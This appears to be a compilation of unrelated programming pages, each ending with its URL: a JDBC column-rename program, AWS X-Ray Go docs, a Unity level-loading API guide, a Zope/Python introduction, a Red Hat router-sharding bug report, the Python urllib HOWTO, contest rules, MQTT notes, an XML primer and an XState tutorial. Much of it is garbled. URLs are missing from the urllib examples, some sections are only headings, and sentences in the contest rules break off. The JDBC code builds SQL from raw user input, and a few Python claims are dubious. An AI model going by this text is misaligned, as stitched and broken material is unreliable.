    System.out.println("Change column name in a database table");
    try {
      // Load the MySQL driver and open a connection (placeholder URL/credentials).
      Class.forName("com.mysql.jdbc.Driver");
      Connection con = DriverManager.getConnection(
          "jdbc:mysql://localhost:3306/test", "root", "root");
      BufferedReader bf = new BufferedReader(new InputStreamReader(System.in));
      System.out.println("Enter table name:");
      String table = bf.readLine();
      System.out.println("Enter old column name:");
      String old_col = bf.readLine();
      System.out.println("Enter new column:");
      String new_col = bf.readLine();
      System.out.println("Enter data type:");
      String type = bf.readLine();
      try {
        Statement st = con.createStatement();
        int n = st.executeUpdate(
            "ALTER TABLE "+table+" CHANGE "+old_col+" "+new_col+" "+type);
        System.out.println("Query OK, "+n+" rows affected");
      } catch (SQLException s){
        System.out.println("Wrong entry!");
      }
    } catch (Exception e){
      e.printStackTrace();
    }
  }
}

Database Table: Student

Output of program: After the change, the Student table will look like this. (Table images omitted.)
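As a cross-check of the ALTER TABLE idea in a different stack, here is a hedged sketch using Python's built-in sqlite3 module. Note that SQLite's syntax (RENAME COLUMN, supported from SQLite 3.25 on) differs from MySQL's CHANGE, and the table and column names are illustrative:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE student (id INTEGER, name TEXT)")
con.execute("INSERT INTO student VALUES (1, 'A')")

# Rename the column; SQLite does not need the data type restated,
# unlike MySQL's ALTER TABLE ... CHANGE old new type.
con.execute("ALTER TABLE student RENAME COLUMN name TO full_name")

cols = [row[1] for row in con.execute("PRAGMA table_info(student)")]
print(cols)  # ['id', 'full_name']
```

The data survives the rename; only the schema changes.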
http://www.roseindia.net/jdbc/jdbc-mysql/ChangeColumnName.shtml
Add Annotations and Metadata to Segments with the X-Ray SDK for Go

You can record additional information about requests, the environment, or your application with annotations and metadata. You can add annotations and metadata to the segments that the X-Ray SDK creates, or to custom subsegments that you create.

Annotations are key-value pairs with string, number, or Boolean values. Annotations are indexed for use with filter expressions. Use annotations to record data that you want to use to group traces in the console, or when calling the GetTraceSummaries API.

Metadata are key-value pairs that can have values of any type, including objects and lists, but are not indexed for use with filter expressions. Use metadata to record additional data that you want stored in the trace but don't need to use with search.

In addition to annotations and metadata, you can also record user ID strings on segments. User IDs are recorded in a separate field on segments and are indexed for use with search.

Sections

Recording Annotations with the X-Ray SDK for Go

Use annotations to record information on segments that you want indexed for search.

Annotation Requirements

Keys – Up to 500 alphanumeric characters. No spaces or symbols except underscores.
Values – Up to 1,000 Unicode characters.
Entries – Up to 50 annotations per trace.

To record annotations, call AddAnnotation with the key and the value you want to associate with the segment.

xray.AddAnnotation( key string, value interface{})

The SDK records annotations as key-value pairs in an annotations object in the segment document. Calling AddAnnotation twice with the same key overwrites previously recorded values on the same segment.

To find traces that have annotations with specific values, use the annotations.key keyword in a filter expression.

Recording Metadata with the X-Ray SDK for Go

Use metadata to record information on segments that you don't need indexed for search. To record metadata, call AddMetadata with the key and the value you want to associate with the segment.

xray.AddMetadata( key string, value interface{})

Recording User IDs with the X-Ray SDK for Go

Record user IDs on request segments to identify the user who sent the request.

To record user IDs:

Get a reference to the current segment from AWSXRay.

import (
    "context"
    "github.com/aws/aws-xray-sdk-go/xray"
)

mySegment := xray.GetSegment( context)

Set the User field with a string ID of the user who sent the request.

mySegment.User = " U12345"

To find traces for a user ID, use the user keyword in a filter expression.
https://docs.aws.amazon.com/xray/latest/devguide/xray-sdk-go-segment.html
One of the most powerful parts of Mad Level Manager is how it manages level loading. You defined your levels earlier using the Configurator; now you can take full advantage of that.

Common Workflow

There is only one class that you need to know about: MadLevel (click to check out the detailed class documentation). This class is defined in the MadLevelManager namespace, so don't forget to put this at the top of your C# file:

using MadLevelManager;

Let's say that you've named your first level First Level. Loading this level is quite straightforward:

MadLevel.LoadLevelByName("First Level");

It will work, but you need to know the level name here. If this is the first level of type Level in your level configuration, then you can make it much better:

MadLevel.LoadFirst(MadLevel.Type.Level);

Now you don't need to know the name of the first level. This code will work in any project with a level configuration and at least one level defined. How cool is that?

The player has just finished a level and wants to go to the next one. No problem at all!

MadLevel.LoadNext(MadLevel.Type.Level);

LoadNext looks for the next level of type Level and loads it. It is just that easy! But what if this is the last level of your game? Then you can do the following:

if (MadLevel.HasNext(MadLevel.Type.Level)) {
    MadLevel.LoadNext(MadLevel.Type.Level);
} else {
    MadLevel.LoadLevelByName("Game Finished");
}

This code checks whether there is any other level that can be loaded. If not, the Game Finished level is loaded, which should be of type Other. In this way you complete the setup of your level workflow!

Going back

Do you want to go back to the previous level? LoadNext() has its opposite:

MadLevel.LoadPrevious(MadLevel.Type.Level);

Maybe you want to restart your whole game? Then you want to load the very first level of any type defined in your configuration. Here's how to do it:

MadLevel.LoadFirst();

Which configuration is active?
You can easily get the current configuration name:

var configurationName = MadLevel.activeConfiguration.name;

This way you can change your game's behavior at runtime based on the configuration name. Let's assume that you have two configurations named like this:

- My Game
- My Game Demo

Now you can create a condition:

var configurationName = MadLevel.activeConfiguration.name;
if (configurationName.EndsWith("Demo")) {
    Debug.Log("This is a demo version");
} else {
    Debug.Log("This is a full version");
}

More info

You will probably be interested in looking at the full MadLevel API, and maybe the MadLevelConfiguration API, which is available as the field MadLevel.activeConfiguration.
http://madlevelmanager.madpixelmachine.com/doc/latest/basics/level_workflow_api.html
Zope is a web application server, similar in concept to proprietary products like Cold Fusion. However, it is free software that is available under the GPL-compatible Zope Public License, which is very similar to the BSD License. Zope was designed with the specific goals of creating a powerful, secure framework for the development of robust web-based services with a minimum of effort. However, Zope's biggest distinguishing characteristic is how closely it models the language it is written in: Python. In fact, many of its features are directly derived from its underlying Python structure. Because of that, it's difficult to truly understand or appreciate Zope without having a basic knowledge of Python. This article, the first in a two-part series, is intended as a high-level introduction to the language. Next month's instalment will build upon this by demonstrating practical examples of Zope code.

Language features

Although Python has been in use since the early 1990's, it's only become relatively popular in the last few years. Many programmers view it as the spiritual successor to Perl. That is, it's an expressive, interpreted language that's equally at home in small system scripts or much larger applications. However, it has the deserved reputation of usually being easier to read and maintain than the equivalent Perl code. Python also sports an excellent object-oriented approach that's much cleaner and more integral to the overall design than is Perl's. Perhaps most important, though, is a belief by the core development team in doing things the right way. It was designed from the beginning with an emphasis on practical elegance: Python strives to allow programmers to easily express their ideas in intuitive ways.
Significant whitespace

The first thing that everyone notices about Python is its use of significant whitespace. Rather than marking blocks of code with keywords such as "begin" and "end", or curly brackets a la C, Python sets them apart with indentation. Frankly, a lot of programmers hate the idea when they first see it. If you're one of them, don't be discouraged; the feeling passes quickly. It enforces the style guidelines that most good programmers would be following anyway, and soon becomes quite natural. Python is flexible regarding the use of spaces versus tabs, as long as you consistently use the same kind and amount of whitespace to indent. Furthermore, almost all programming editors have Python modes that handle the details for you. The standard comparison of formatting between C and Python is the "factorial" function. In C, that could be written as:

int factorial(int i)
{
    if(i == 1) {
        return 1;
    } else {
        return i * factorial(i - 1);
    }
}

(or in one of many other common styles). A Python programmer would probably write something extremely similar to:

def factorial(i):
    if i == 1:
        return i
    else:
        return i * factorial(i - 1)

Except for the missing curly brackets, the formatting is almost identical between the two.

Interactive development

Python includes an interactive shell where you can experiment and test new code. Running the python command without any arguments will result in something like:

Python 2.3.5 (#1, Apr 27 2005, 08:55:40)
>>>

At this point, you can enter Python commands directly to see their effect. If you're working on a large project, you can load specific parts of it for manual testing without affecting other modules. It's equally handy for verifying that short functions will work as expected before embedding them into a larger body of code.
It's difficult to convey exactly how convenient this is, and how efficient the code-experiment-code cycle can be. Finally, the interactive prompt is an excellent place to explore objects, and the data and functions inside them. Typing dir(someobject) will return the list of objects referenced by someobject, and most of the functions in Python's core libraries contain a __doc__ attribute with usage information:

>>> dir(str)
[lots of stuff, ..., 'translate', 'upper', 'zfill']
>>> print str.upper.__doc__
S.upper() -> string

Return a copy of the string S converted to uppercase.

Tiny core language

Python 2.3.5, the version recommended for use with the latest production release of Zope, has just 29 reserved words. Perl has quite a few more: 206 as of version 5.6.8. PHP tips the scales with up to an incredible 3972 commands and functions in the base language (although many can be added and removed at compilation time). The practical upshot is that any experienced programmer should be able to memorize the entire language in an evening. This simplicity does not reflect a lack of power though. Although most of the familiar commands are similar to their counterparts in other languages, several are significantly more flexible. The for command, as an example, will cheerfully iterate across a set of numbers, a list of strings, or the keys of a dictionary object.

Python keywords

The whole language is built upon a short list of words: and, del, for, is, raise, assert, elif, from, lambda, return, break, else, global, not, try, class, except, if, or, while, continue, exec, import, pass, yield, def, finally, in, and print. If you've ever written a program, you probably already have an accurate idea of what most of them do.

Strong dynamic typing

Python is dynamically typed, which means that it executes its type checks during program execution (as opposed to C).
It is also strongly typed, meaning that it won't convert data from one type to another unless you explicitly ask it to (as opposed to Perl). The language makes great use of this flexibility by passing parameters to functions by reference instead of by value. The net effect is that you can pass almost any object to a function, and if the operations in the function make sense for that type of object, then the function will work as expected. For example, the following code defines a function that will add any two compatible values together:
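A minimal sketch consistent with that description (the function name add is my own choice; any operands supporting "+" will work, thanks to dynamic typing):

```python
# One definition works for numbers, strings, lists... anything
# whose type supports the "+" operation.
def add(a, b):
    return a + b

print(add(2, 3))        # 5
print(add("ab", "cd"))  # abcd
print(add([1], [2]))    # [1, 2]
```

Passing incompatible operands (say, a string and a list) raises a TypeError instead of silently converting, which is what "strongly typed" means here.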
http://www.freesoftwaremagazine.com/comment/52
Red Hat Bugzilla – Bug 1479295 Router sharding causes routes in new namespaces detection to be delayed Last modified: 2017-12-19 07:28:11 EST

3. What is the nature and description of the request?

When using NAMESPACE_LABEL based router sharding, we created a default template to make sure new namespaces get the correct label. When I create a new namespace/project it gets the correct label, but the route doesn't work for 10-15 minutes (the pods are up a few seconds after namespace creation). In an ideal situation, I would expect the routes to work right after my application is up and running. However, it is observed that the default resync interval is 10 minutes, which is pretty high.

4. Why does the customer need this? (List the business requirements here)

Router-sharded production environment with approximately 1500 routes. Fix the auto-sync of new namespaces created with NAMESPACE_LABEL so new routes are created as soon as new namespaces are created.

5. How would the customer like to achieve this? (List the functional requirements here)

The resync interval should be reduced, which should be safe enough for production environments having at least 2000 routes, and it shouldn't affect CPU, network, and memory metrics.

This BZ was opened as a continuation of the following bugzilla bug report:. The issue, and the way it was closed as WONTFIX, is a bit confusing: regular routes in OpenShift are admitted immediately onto all routers, so why should there be any discrimination between regular routes and routers on the one hand, and sharded (namespace-labeled) routes and sharded routers on the other? In our view, a new route in a new namespace should be recognized immediately by a preexisting router even in a sharded environment, and not wait for a full resync, which is <10 minutes away by default.

ccoleman@redhat.com, eparis@redhat.com What would you like to do about this? It is a duplicate of 1355711, which is closed as won't fix. Also, duplicate of:

*** Bug 1479452 has been marked as a duplicate of this bug.
***

Hi, can I ask what your plans are for this case? We are about to upgrade our OpenShift environment, and it depends on router sharding.

We are working on the fix so that a sharded router based on namespace or project labels notices routes immediately, just like the behavior you observe on a non-sharded router. Hoping to get the fix into one of the 3.6.x releases.

Created trello card:

*** Bug 1486322 has been marked as a duplicate of this bug. ***

Fix merged in origin and will be available in the 3.7.1 release. Earlier releases can use the workaround of setting the router 'resync-interval' to a lower value.
https://bugzilla.redhat.com/show_bug.cgi?id=1479295
HOWTO Fetch Internet Resources Using The urllib Package

Author

Note: There is a French translation of an earlier revision of this HOWTO, available at urllib2 - Le Manuel manquant.

Introduction

Fetching URLs

The simplest way to use urllib.request is as follows:

import urllib.request
with urllib.request.urlopen('') as response:
    html = response.read()

If you wish to retrieve a resource via URL and store it in a temporary location, you can do so via the shutil.copyfileobj() and tempfile.NamedTemporaryFile() functions:

import shutil
import tempfile
import urllib.request

with urllib.request.urlopen('') as response:
    with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
        shutil.copyfileobj(response, tmp_file)

with open(tmp_file.name) as html:
    pass

Many uses of urllib will be that simple (note that instead of an 'http:' URL we could have used a URL starting with 'ftp:' or 'file:'). You can also create a Request object and pass it to urlopen:

req = urllib.request.Request('')
with urllib.request.urlopen(req) as response:
    the_page = response.read()

Data

Sometimes you want to send data to a URL (often the URL will refer to a CGI (Common Gateway Interface) script):

data = data.encode('ascii')  # data should be bytes
req = urllib.request.Request(url, data)
with urllib.request.urlopen(req) as response:
    the_page = response.read()

Note that other encodings are sometimes required (e.g. for file upload from HTML forms - see HTML Specification, Form Submission for more details). If you do not pass the data argument, urllib uses a GET request.

Headers

We'll discuss here one particular HTTP header, to illustrate how to add headers to your HTTP request. Some websites 1 dislike being browsed by programs, or send different versions to different browsers 2. The way a browser identifies itself is through the User-Agent header 3. When you create a Request object you can pass a dictionary of headers in. The following example makes the same request as above, but identifies itself as a version of Internet Explorer 4.
import urllib.parse
import urllib.request

url = ''
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'
values = {'name': 'Michael Foord',
          'location': 'Northampton',
          'language': 'Python' }
headers = {'User-Agent': user_agent}

data = urllib.parse.urlencode(values)
data = data.encode('ascii')
req = urllib.request.Request(url, data, headers)
with urllib.request.urlopen(req) as response:
    the_page = response.read()

The response also has two useful methods. See the section on info and geturl, which comes after we have a look at what happens when things go wrong.

Handling Exceptions

URLError

Often, URLError is raised because there is no network connection (no route to the specified server), or the specified server doesn't exist. In this case, the exception raised will have a 'reason' attribute, which is a tuple containing an error code and a text error message. e.g.

>>> req = urllib.request.Request('')
>>> try: urllib.request.urlopen(req)
... except urllib.error.URLError as e:
...     print(e.reason)
...
(4, 'getaddrinfo failed')

HTTPError

Typical error codes include '404' (page not found), '403' (request forbidden), and '401' (authentication required). See section 10 of RFC 2616 for a reference on all the HTTP error codes. The HTTPError instance raised will have an integer 'code' attribute, which corresponds to the error sent by the server.

Error Codes

...

Wrapping it Up

So if you want to be prepared for HTTPError or URLError there are two basic approaches. I prefer the second approach.

Number 1

Number 2

from urllib.request import Request, urlopen
from urllib.error import URLError

# everything is fine

info and geturl

'Content-length', 'Content-type', and so on. See the Quick Reference to HTTP Headers for a useful listing of HTTP headers with brief explanations of their meaning and use.

Openers and Handlers

Basic Authentication

When authentication is required, the server sends a header requesting it, including a 'realm'. The header looks like: WWW-Authenticate: SCHEME realm="REALM". e.g.
WWW-Authenticate: Basic realm="cPanel Users" The client should then retry the request with the appropriate name and password for the realm included as a header in the request. This is 'basic authentication'. The default opener installs handlers for the common cases - ProxyHandler, UnknownHandler, HTTPHandler, HTTPDefaultErrorHandler, HTTPRedirectHandler, FTPHandler, FileHandler, DataHandler, HTTPErrorProcessor. top_level_url is in fact either a full URL (including the 'http:' scheme component and the hostname and optionally the port number) e.g. "http://example.com/" or an "authority" (i.e. the hostname, optionally including the port number) e.g. "example.com". Proxies¶ urllib will auto-detect your proxy settings and use those. This is through the ProxyHandler, which is part of the normal handler chain when a proxy setting is detected. Normally that's a good thing, but there are occasions when it may not be helpful 5. Note Currently urllib.request does not support fetching of https locations through a proxy. However, this can be enabled by extending urllib.request as shown in the recipe 6. Note HTTP_PROXY will be ignored if a variable REQUEST_METHOD is set; see the documentation on getproxies(). Sockets and Layers¶ Notes¶ This document was reviewed and revised by John Lee. - 1 Google for example. - 2 Browser sniffing is a very bad practice for website design - building sites using web standards is much more sensible. Unfortunately a lot of sites still send different versions to different browsers. - 3 The user agent for MSIE 6 is 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)' - 4 For details of more HTTP request headers, see Quick Reference to HTTP Headers. - 5 In my case I have to use a proxy to access the internet at work. If you attempt to fetch localhost URLs through this proxy it blocks them. IE is set to use the proxy, which urllib picks up on. In order to test scripts with a localhost server, I have to prevent urllib from using the proxy. - 6 urllib opener for SSL proxy (CONNECT method): ASPN Cookbook Recipe.
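The basic-authentication flow described above is usually wired up with a password manager and a handler; here is a minimal sketch. The URL and credentials are placeholders of ours, not values from the HOWTO.

```python
import urllib.request

# Hypothetical endpoint and credentials -- substitute your own.
top_level_url = "http://example.com/foo/"

password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
# Passing None as the realm means: use these credentials for any realm
# at this URL (the "default realm" behavior).
password_mgr.add_password(None, top_level_url, "username", "password")

handler = urllib.request.HTTPBasicAuthHandler(password_mgr)
opener = urllib.request.build_opener(handler)

# Either use the opener directly (opener.open(url)), or install it so
# that all subsequent urllib.request.urlopen calls use it:
urllib.request.install_opener(opener)
```

Once the opener is installed, plain urlopen calls will answer 401 challenges for that URL automatically.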
https://docs.python.org/fr/3.7/howto/urllib2.html
The following represents the normal restrictions to input and output. If exceptions are to be made, they will be explicitly stated in the Input or Output sections of the problem descriptions. Most problems will include a sample instance in order to describe the problem and demonstrate what is being asked. Sometimes, but not always, this sample is included in the Sample Input, which is always given at the end of the problem description, along with the corresponding Sample Output. Do not assume that the Sample Input includes the sample instance discussed in the problem. The compilers used are Microsoft C/C++ Version 9.0.21022 and Sun JDK 1.6. All standard C/C++ libraries (including STL) and Java API are available, except for those that are deemed dangerous by contest officials (e.g., that might generate a security violation). Note the following C++ considerations: Your programs will have a limit on the amount of memory and CPU time they can use. Your program is allowed a maximum of 64MB for the data and 64MB for the stack. There is also a limit of 5MB on the amount of output your program is allowed to produce. Since the judging machine is different from the contestant machines, it is meaningless to post the CPU time limit used for judging. Please note that the CPU time limits set on the contestant machines are different from those set on the judging machine. Each submission will receive one of the following responses. The first one that the judges notice will be issued. NO - Compilation Error NO - Run-time Error NO - Time Limit Exceeded NO - Wrong Answer NO - Security Violation NO - Output Format Error NO - Excessive Output NO - Insufficient Output NO - Other - Contact Staff YES - Correct Answer "YES - Correct Answer" means that your program gave the correct output on all test cases, so you can start celebrating! (but not for too long - there are still other problems!)
"NO - Other - Contact staff" is used for an incorrect submission when the judges wish to tell you more information about your submission. For example, perhaps you submitted the solution of problem E for problem F. Upon receiving this response, the contestant should submit a clarification request to the judges. The judges will then reply with a more detailed message. This response will be rare "NO - Output format error" means the output. (See "Problems Involving Floating-Point Precision" below.) "NO - Wrong answer" means at least one calculated result for at least one problem instance was incorrect. Even if you are correct on 99 problem instances but are wrong on the last one, you will get this response. (See "Problems Involving Floating-Point Precision" below.) Problems Involving Floating-Point Precision: Incorrect use of precision will only be judged as a Wrong Answer when the resulting value is not equal to the correct value. For example, if the judges' answer is 9.890, then "NO - Excessive Output" means that your program output results for more test cases than there were in the judges' test file. Note that this does not mean that there was excessive output for true test cases - this would be a presentation error. For example, if there were two test cases in the test file, and the output expected looked like "Case n: The answer is x", then the following is a presentation error: Case 1: The answer is 10 gkjh Case 2: The answer is 12 while the following is an excessive output error Case 1: The answer is 10 Case 2: The answer is 12 Case 3: The answer is "NO - Insufficient Output" means that your program did not process all of the judges test cases. Continuing with the example above, an insufficient output error would be Case 1: The answer is 10 "NO - Run-time error" means that your program crashed when run on judges' data. This includes running out of memory. "NO - Security violation" is explained later in this document. 
"NO - Compilation error" means that your program did not compile. When you arrive at your assigned workstation, you should be presented with a PC^2 login screen. Enter your team ID and password to log in. Note: If you exit PC^2, you will need to restart PC^2 and log in again. If you did not properly log out, you will not be allowed to log in. If this happens, please inform a proctor. You may use any of the text editors or IDEs installed on the workstation to write your programs. Windows Calculator is also allowed. Use of any internet web browser may be cause for disqualification. Compiler/IDEs available for C, C++ and Java are: Compilers for Java: For source code submission to the judges, the PC^2 environment is used. It is not an IDE. If you want to get familiarized with PC^2, check out You can write code in one of the above IDEs, or use Notepad++, VIM editor (Windows version), or Notepad. Your program source and input files should be named in the following way: where "PROB" is the problem letter you are trying to solve. The scripts executed by the "Test" button in PC^2 assume that you have used these file names. Your submission should not include more than one file unless you are using Java. For example, if you are working on problem C, then your program source can be in C.c, C.cpp, C.java or C.cs, and your input file can be C.in.dat. Java notes: If you are using multiple source files in Java, choose the main class as the "Main File" and any other required files as the "Additional Files". Remember that your file names must correspond to the public class names in the file. Your program will be killed automatically if it uses too much CPU time. If you wish to terminate the program yourself, go to the window and press Ctrl-C (Control+c). Note: The time limits on the contestant machines may not correspond to those on the judging machines because of differences in processor speed.
It is highly recommended that you use the "Test" button in PC^2 to do the testing, since this will execute your program in exactly the same way as it would be executed by the judges (on different data, of course). You are not allowed to use debuggers in this contest. You may use output statements to provide information to help you debug your program. Note: Remember to remove this output (even if it is to stderr, cerr, or java.lang.System.err) before submitting your program. All questions about the problem set must be communicated to the judges by sending clarification requests. To do so, click on the "Clarifications" tab in the PC^2 window and click on "Request Clar". Then, select the problem, enter your request, and click "Submit". The scoreboard will be projected on the whiteboard for all contestants to see during the contest. Files can be printed using the application's print function. Your name must be on your printout or you will not be allowed to pick it up. Suppose that you are solving the following problem (real problem descriptions will be more detailed and probably a little harder): read a sequence of integers, ending with 0, and print each integer plus one. Sample Input: 1 2 3 0 Sample Output: 2 3 4 If you are using C, you should enter the following program and save it as A.c: #include <stdio.h> int main(void) { int n; while (scanf("%d", &n) == 1 && n != 0) { printf("%d\n", n+1); } return 0; } If you are using C++, you should enter the following program and save it as A.cpp: #include <iostream> using namespace std; int main(void) { int n; while (cin >> n && n != 0) { cout << n+1 << endl; } return 0; } If you are using Java, you should enter the following program and save it as A.java: import java.util.Scanner; public class A { public static void main(String[] args) { Scanner in = new Scanner(System.in); int n = in.nextInt(); while (n != 0) { System.out.println(n+1); n = in.nextInt(); } } } You should save the input files under the names A.1.dat, A.2.dat, ... For example, you may want to enter the following into A.1.dat: 1 2 3 0.
In the PC^2 window, select the problem and the language you choose, as well as the program source file. Click the "Submit" button.
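For comparison only - Python is not among the accepted contest languages listed above - the same read-until-sentinel logic of the sample problem can be sketched like this:

```python
def solve(numbers):
    """Return n+1 for each value that appears before the 0 sentinel."""
    out = []
    for n in numbers:
        if n == 0:
            break
        out.append(n + 1)
    return out

# The sample input from the problem statement:
print(solve([1, 2, 3, 0]))  # [2, 3, 4]
```

Separating the loop into a function like this also makes the logic easy to test without piping a file into stdin, which is one reason the "Test" button workflow above is so valuable for the compiled languages.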
http://www-personal.umd.umich.edu/~dennismv/umdcontest/general_information_for_contestants.html
This example uses the mbed EthernetInterface to show how this works. The MQTT library contains an MQTTEthernet.h header, which is a wrapper around the mbed Ethernet interface. To use the MQTT API with Ethernet, include the following two headers: #include "MQTTEthernet.h" #include "MQTTClient.h" then instantiate an MQTT client like this: MQTTEthernet ipstack = MQTTEthernet(); MQTT::Client<MQTTEthernet, Countdown> client = MQTT::Client<MQTTEthernet, Countdown>(ipstack); Countdown is a timer class supplied in the MQTT library that is specific to mbed, so you should not need to change it. If you want to use the MQTT API with a different network stack, create an interface header similar to MQTTEthernet.h. The class you create must have the following two methods at a minimum: int read(char* buffer, int len, int timeout); int write(char* buffer, int len, int timeout); where the timeout is in milliseconds, and the return value is the number of characters read from or written to the network, or -1 on failure.
https://developer.mbed.org/teams/mqtt/code/HelloMQTT/log/49c9daf2b0ff/easy-connect.lib
XML 1.0 and Namespaces XML 1.0 and Namespaces in XML provide a tag-based syntax for structuring data and applying markups to documents. Documents that conform to XML 1.0 and Namespaces in XML specifications may be made up of a variety of syntactic constructs such as elements, namespace declarations, attributes, processing instructions, comments, and text. This chapter provides a description of each of the structural elements in XML along with their syntax. 1.1 Elements <tagname></tagname> <tagname/> <tagname>children</tagname> Elements typically make up the majority of the content of an XML document. Every XML document has exactly one top-level element, known as the document element. Elements have a name and may also have children. These children may themselves be elements or may be processing instructions, comments, CDATA sections, or characters. The children of an element are ordered. Elements may also be annotated with attributes. The attributes of an element are unordered. An element may also have namespace declarations associated with it. The namespace declarations of an element are unordered. Elements are serialized as a pair of tags: an open tag and a close tag. The syntax for an open tag is the less-than character (<) immediately followed by the name of the element, also known as the tagname, followed by the greater-than character (>). The syntax for a close tag is the character sequence </ immediately followed by the tagname, followed by the greater-than character. The children of an element are serialized between the open and close tags of their parent. In cases when an element has no children, the element is said to be empty. A shorthand syntax may be used for empty elements consisting of the less-than character immediately followed by the tagname, followed by the character sequence />. XML does not define any element names; rather, it allows the designer of an XML document to choose what names will be used. 
Element names in XML are case sensitive and must begin with a letter or an underscore (_). The initial character may be followed by any number of letters, digits, periods (.), hyphens (-), underscores, or colons (:). However, because colons are used as part of the syntax for namespaces in XML, they should not be used except as described by that specification (see Section 1.2). Element names that begin with the character sequence xml, or any recapitalization thereof, are reserved by the XML specification for future use. Examples An element with children <Person> <name>Martin</name> <age>33</age> </Person> An element with a tagname of Person. The element has children with tagnames of name and age. Both of these child elements have text content. An empty element <Paid></Paid> An empty element with a tagname of Paid Empty element shorthand <Paid/> An empty element with a tagname of Paid using the shorthand syntax
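The Person example above can be built and serialized programmatically; here is a sketch using Python's xml.etree.ElementTree (the tool choice is ours - the chapter itself is tool-agnostic):

```python
import xml.etree.ElementTree as ET

# Build the document element with two ordered children.
person = ET.Element("Person")
name = ET.SubElement(person, "name")
name.text = "Martin"
age = ET.SubElement(person, "age")
age.text = "33"

# An empty element; the serializer emits the <Paid /> shorthand.
ET.SubElement(person, "Paid")

xml_text = ET.tostring(person, encoding="unicode")
print(xml_text)
# <Person><name>Martin</name><age>33</age><Paid /></Person>
```

Note that the serializer preserves the ordering of children, as the specification requires, and uses the empty-element shorthand for Paid automatically.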
http://www.informit.com/articles/article.aspx?p=24502
When starting a new React project, one of the most difficult steps is deciding how to manage the application state. Historically, many projects have used local state or libraries like Redux, and others have implemented a custom mix between the two. In this traditional way of managing state, as the application grows, we start adding more and more data to keep track of the application state, and this can lead to many bugs or invalid states. TypeScript can help immensely on this front, as it enforces a state model to be respected, but there is still a lot of room for bugs to surface. We're going to use another pattern for managing state that aims to solve this problem: state machines, a mathematical model of computation that describes the behavior of a system that can only be in one state at any given time. State machines have been around for a while and, as you'll see, using them is a more formal and deterministic way of managing state. In this post, I'm going to show you why and how to use state machines to handle state in a React application with a lot more confidence. What is XState? XState is a library that allows you to create, interpret and execute state machines and statecharts. State machines are abstract models defined by a finite number of states, events and the transitions between those states. Statecharts are basically state machines on steroids: they introduce nested states, parallel states, and extended state, among other things. When using state machines, it's necessary to model the entire set of states, events and transitions beforehand. This can seem like a tedious exercise, but it will give us total confidence in what is happening at each moment, because anything that wasn't explicitly defined can't happen. Now that we've got the concepts down, let's get coding. Project Setup First let's create a simple React project. For that we can use create-react-app, set to use the TypeScript template.
npx create-react-app xstate-getting-started --template typescript Then, the next step is to install XState. xstate is the core package, which we need to create our state machines. @xstate/react provides hooks for easy integration with our React components. npm install xstate @xstate/react The project is good to go, let's get started creating our first state machine! Modeling the Machine This tutorial will use a traffic light model as an example, so in order to define the model, we need to go through the very basic states, events and context that a traffic light has. In its most basic form, a traffic light has 3 states: green, yellow and red. What events does it have? A traffic light loops through the 3 light colors, and nothing else. So we'll only need a single NEXT event, which will trigger a transition of the traffic light to the next color in the loop. We're using TypeScript on this project; since XState is written in TypeScript, it provides first-class support for strongly typing State, Events and Context, so a wise move is to type our domain. Events in XState are what causes the state machine to transition from its current state into its next state. Our Event type is declared as a Union Type of all the possible Events. type TrafficLightEvent = { type: "NEXT" }; The last step is to define how our state looks using something called Typestates, a concept where we type the possible state values and how each value goes along with context. This can be really powerful in more complex machines; in this simple example it is used just to represent the possible state values, since the context is not used. type TrafficLightState = | { value: "green"; context: undefined } | { value: "yellow"; context: undefined } | { value: "red"; context: undefined }; Now that everything is typed, it's ready to create the machine.
export const trafficLightMachine = createMachine({ id: "trafficLight", initial: "red", states: { green: { on: { NEXT: "yellow" }, }, yellow: { on: { NEXT: "red" }, }, red: { on: { NEXT: "green" }, }, }, }); Let's go over a couple of details that were not mentioned before: the id - the machine identifier - and the initial state value, which is the state the machine starts in. The states property is defined with the possible states, which events each state handles, and what state the machine should transition to when the event is triggered. In this scenario, every state handles the NEXT event, but this does not have to be the case. For example, if the 'on' property were missing on the red state, the machine would be forever stuck in red, since there would be no event that could transition out of it. And that's it, that is our completed, working state machine. Visualizing our State Machine Now the cool part, let's visualize it. XState has its own Visualizer tool: Our traffic light state machine It enables developers to see the machine, the possible states, and how events transition from one state to the other. In the visualizer itself, you can also click on the events, and that will show the state transitions - it's really cool. Now, let's take our newly made machine and implement it in a React component. Integrating with React import React from "react"; import "./App.css"; import { useMachine } from "@xstate/react"; import { trafficLightMachine } from "./trafficLightMachine"; export const App = () => { // Typescript will infer what current and send are here // And will provide useful information about usage const [current, send] = useMachine(trafficLightMachine); return ( <div> <div /> <div> <button onClick={() => send("NEXT")}>NEXT</button> </div> </div> ); }; The first action is to import the machine and the useMachine hook from the @xstate/react package.
The matches function checks what state the machine is currently in: if it is in the red state, current.matches('red') will be true. The send function acts a lot like dispatch does for Redux - it just sends the event you want to the machine, in this case NEXT. Running it and hitting the button, the traffic light colors will change! Wrapping Up Okay! Now you know what state machines are, how they work, why they are useful, and how to implement one with React. Even though this example is extremely simple, it will give you insights into how state machines can model complex business logic, and the confidence that they can give you on your projects. You can review the sample code. Santiago Kent
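The transition table in the traffic-light machine above is not specific to XState or JavaScript. As a concept sketch (ours, not from the original post), the same machine can be written as a plain dictionary in Python:

```python
# A minimal finite state machine: states, events, and a transition table.
TRANSITIONS = {
    ("green", "NEXT"): "yellow",
    ("yellow", "NEXT"): "red",
    ("red", "NEXT"): "green",
}

def transition(state, event):
    # Anything not explicitly defined can't happen: an unknown
    # state/event pair leaves the machine in its current state.
    return TRANSITIONS.get((state, event), state)

state = "red"  # the machine's initial state, as above
history = []
for _ in range(3):
    state = transition(state, "NEXT")
    history.append(state)
print(history)  # ['green', 'yellow', 'red']
```

This illustrates the determinism the post is after: the entire behavior is enumerated up front, and any event not in the table is simply a no-op.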
https://moduscreate.com/blog/xstate-react-typescript/
